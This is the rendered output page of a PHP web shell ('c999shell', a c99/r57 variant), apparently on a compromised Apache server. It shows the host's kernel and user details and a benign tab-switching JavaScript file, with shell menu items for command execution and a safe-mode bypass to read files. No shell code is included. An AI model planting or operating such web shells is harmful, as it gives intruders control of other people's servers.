Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/cvc/js/ drwxr-xr-x |
Viewing file: tabChoose.js (1.67 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | // START tab script // Adapted from "Javascript + CSS + DOM Magic" by Makiko Itoh // define variables for "if n4 (Netscape 4), if IE (IE 4.x), // and if n6 (if Netscape 6/W3C-DOM compliant)" var n4, ie, n6; // detect browser support for certain key objects/methods // and assemble a custom document object var doc,doc2,doc3,sty; if (document.layers) { doc = "document."; doc2 = ".document."; doc3 = ""; sty = ""; n4 = true; } else if (document.all) { doc = "document.all."; doc2 = ""; doc3 = ""; sty = ".style"; ie = true; } else if (document.getElementById) { doc = "document.getElementById('"; doc2 ="')"; doc3 ="')"; sty = "').style"; n6 = true; } // display block or none DIV element function blocknone(divname,tabidname,state,tabcolor,tabbg,cursortype) { if (n4) { divObj = eval (doc + divname); tabObj = eval (doc + tabidname); } else { divObj = eval (doc + divname + sty); tabObj = eval (doc + tabidname + sty); } divObj.display = state; tabObj.color = tabcolor; tabObj.backgroundColor = tabbg; tabObj.cursor = cursortype; } // variables that hold the value of the currently active (open) menu var active_tabcontent = null; var active_tab1 = null; // function closes all active menus and turns back to 'off' state function closeallmenus() { if (active_tabcontent != null) { blocknone(active_tabcontent,active_tab1,'none','#000000','#ABCDEF','pointer'); } } // function controls tab content visibility function controlsubmenu(tabcontent,tabid) { closeallmenus(); blocknone(tabcontent,tabid,'block','#000000','#ffc','text'); active_tabcontent = tabcontent; active_tab1 = tabid } //END guide tab script |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0096 ]-- |